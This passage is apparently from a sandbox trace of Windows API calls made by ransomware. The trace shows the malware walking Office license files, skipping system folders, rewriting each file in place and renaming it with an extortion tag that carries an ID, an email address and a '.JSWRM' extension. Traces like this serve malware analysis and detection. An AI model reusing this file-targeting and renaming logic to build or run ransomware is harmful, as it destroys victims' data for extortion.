dwFlags=0x0, lpWideCharStr="OutlookVL_KMS_Client-ul.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241308, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0106.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_KMS_Client-ul.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0106.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0106.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_KMS_Client-ul.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241268, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0106.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0106.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0106.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0106.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_kms_client-ul.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.732] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9611) returned 1 [0106.732] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2580) returned 0x24c1d0 [0106.732] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2580, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2580, lpOverlapped=0x0) returned 1 [0106.734] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.734] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2580, lpOverlapped=0x0) returned 1 [0106.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.734] CloseHandle (hObject=0x45c) returned 1 [0106.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0106.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0106.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0106.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0106.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0106.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0106.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.735] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_kms_client-ul.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_KMS_Client-ul.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_kms_client-ul.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0106.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0106.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0106.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0106.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0106.736] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe803c6f1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe803c6f1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe80fb2be, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2983, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OutlookVL_MAK-pl.xrm-ms", cAlternateFileName="OUEFE3~1.XRM")) returned 1 [0106.736] lstrcmpiW (lpString1="OutlookVL_MAK-pl.xrm-ms", lpString2=".") returned 1 [0106.736] lstrcmpiW (lpString1="OutlookVL_MAK-pl.xrm-ms", lpString2="..") returned 1 [0106.736] lstrcmpiW (lpString1="OutlookVL_MAK-pl.xrm-ms", lpString2="...") returned 1 [0106.736] lstrcmpiW (lpString1="OutlookVL_MAK-pl.xrm-ms", lpString2="windows") returned -1 [0106.736] lstrcmpiW (lpString1="OutlookVL_MAK-pl.xrm-ms", lpString2="recovery") returned -1 [0106.736] lstrcmpiW (lpString1="OutlookVL_MAK-pl.xrm-ms", lpString2="perflogs") returned -1 [0106.736] lstrcmpiW (lpString1="OutlookVL_MAK-pl.xrm-ms", lpString2="documents and settings") returned 1 [0106.736] lstrcmpiW (lpString1="OutlookVL_MAK-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.736] lstrcmpiW (lpString1="OutlookVL_MAK-pl.xrm-ms", lpString2="system volume information") returned -1 [0106.736] lstrcmpiW (lpString1="OutlookVL_MAK-pl.xrm-ms", lpString2="msocache") returned 1 [0106.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_MAK-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0106.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0106.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_MAK-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x2413d0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0106.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_MAK-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0106.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0106.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_MAK-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x240fe8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0106.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0106.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0106.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0106.737] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_mak-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.737] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10627) returned 1 [0106.737] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0106.737] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0106.739] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.739] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0106.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.739] CloseHandle (hObject=0x45c) returned 1 [0106.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0106.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0106.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0106.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0106.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0106.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0106.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.740] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_mak-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_MAK-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_mak-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0106.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0106.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0106.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0106.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0106.741] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7ff0240, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7ff0240, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe80d5059, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1a4a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OutlookVL_MAK-ppd.xrm-ms", cAlternateFileName="OU313A~1.XRM")) returned 1 [0106.741] lstrcmpiW (lpString1="OutlookVL_MAK-ppd.xrm-ms", lpString2=".") returned 1 [0106.741] lstrcmpiW (lpString1="OutlookVL_MAK-ppd.xrm-ms", lpString2="..") returned 1 [0106.741] lstrcmpiW (lpString1="OutlookVL_MAK-ppd.xrm-ms", lpString2="...") returned 1 [0106.741] lstrcmpiW (lpString1="OutlookVL_MAK-ppd.xrm-ms", lpString2="windows") returned -1 [0106.741] lstrcmpiW (lpString1="OutlookVL_MAK-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.741] lstrcmpiW (lpString1="OutlookVL_MAK-ppd.xrm-ms", lpString2="perflogs") returned -1 [0106.741] lstrcmpiW (lpString1="OutlookVL_MAK-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.741] lstrcmpiW (lpString1="OutlookVL_MAK-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.741] lstrcmpiW (lpString1="OutlookVL_MAK-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.741] lstrcmpiW (lpString1="OutlookVL_MAK-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_MAK-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0106.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0106.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_MAK-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x241178, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0106.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0106.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_MAK-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0106.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0106.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_MAK-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x2413a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0106.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0106.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0106.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0106.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0106.742] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_mak-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.742] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6730) returned 1 [0106.742] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a40) returned 0x205850 [0106.742] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1a40, lpOverlapped=0x0) returned 1 [0106.745] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.745] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1a40, lpOverlapped=0x0) returned 1 [0106.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0106.745] CloseHandle (hObject=0x45c) returned 1 [0106.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0106.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0106.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0106.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0106.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0106.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0106.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.746] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_mak-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_MAK-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_mak-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0106.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0106.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0106.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0106.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0106.747] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7fc9fe7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7fc9fe7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8088bae, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d42, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OutlookVL_MAK-ul-oob.xrm-ms", cAlternateFileName="OU57C7~1.XRM")) returned 1 [0106.747] lstrcmpiW (lpString1="OutlookVL_MAK-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.747] lstrcmpiW (lpString1="OutlookVL_MAK-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.747] lstrcmpiW (lpString1="OutlookVL_MAK-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.747] lstrcmpiW (lpString1="OutlookVL_MAK-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.747] lstrcmpiW (lpString1="OutlookVL_MAK-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.747] lstrcmpiW (lpString1="OutlookVL_MAK-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0106.747] lstrcmpiW (lpString1="OutlookVL_MAK-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.747] lstrcmpiW (lpString1="OutlookVL_MAK-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.747] lstrcmpiW (lpString1="OutlookVL_MAK-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.747] lstrcmpiW 